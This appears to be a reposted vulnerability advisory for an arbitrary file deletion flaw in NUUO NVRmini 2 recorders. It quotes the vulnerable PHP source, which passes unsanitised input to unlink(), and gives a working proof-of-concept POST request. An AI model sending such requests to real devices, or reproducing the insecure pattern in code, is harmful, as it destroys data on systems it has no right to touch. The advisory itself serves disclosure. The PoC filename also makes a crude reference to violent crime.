Home / os / winmobile

NUUO 3.0.8 Arbitrary File Deletion

Posted on 07 August 2016

i>>? NUUO Arbitrary File Deletion Vulnerability Vendor: NUUO Inc. Product web page: http://www.nuuo.com Affected version: <=3.0.8 Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS functionality. Setup is simple and easy, with automatic port forwarding settings built in. NVRmini 2 supports POS integration, making this the perfect solution for small retail chain stores. NVRmini 2 also comes full equipped as a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping and RAID functions for data protection. Choose NVR and know that your valuable video data is safe, always. Desc: Input passed to the 'filename' parameter in 'deletefile.php' is not properly sanitised before being used to delete files. This can be exploited to delete files with the permissions of the web server using their absolute path or via directory traversal sequences passed within the affected POST/GET parameter. ================================================================== /deletefile.php: ---------------- 1: <?php 2: $filename=$_POST['filename']; 3: unlink($filename); 4: if (file_exists($filename)) 5: echo "fail"; 6: else echo "true"; 7: ?> ================================================================== Tested on: GNU/Linux 3.0.8 (armv7l) GNU/Linux 2.6.31.8 (armv5tel) lighttpd/1.4.28 PHP/5.5.3 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5353 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5353.php 14.01.2016 -- POST /deletefile.php HTTP/1.1 Host: 10.0.0.17 Content-Length: x Origin: http://10.0.0.17 X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Connection: close filename=He_molested_murdered_and_mutilated_her.mp4

 

TOP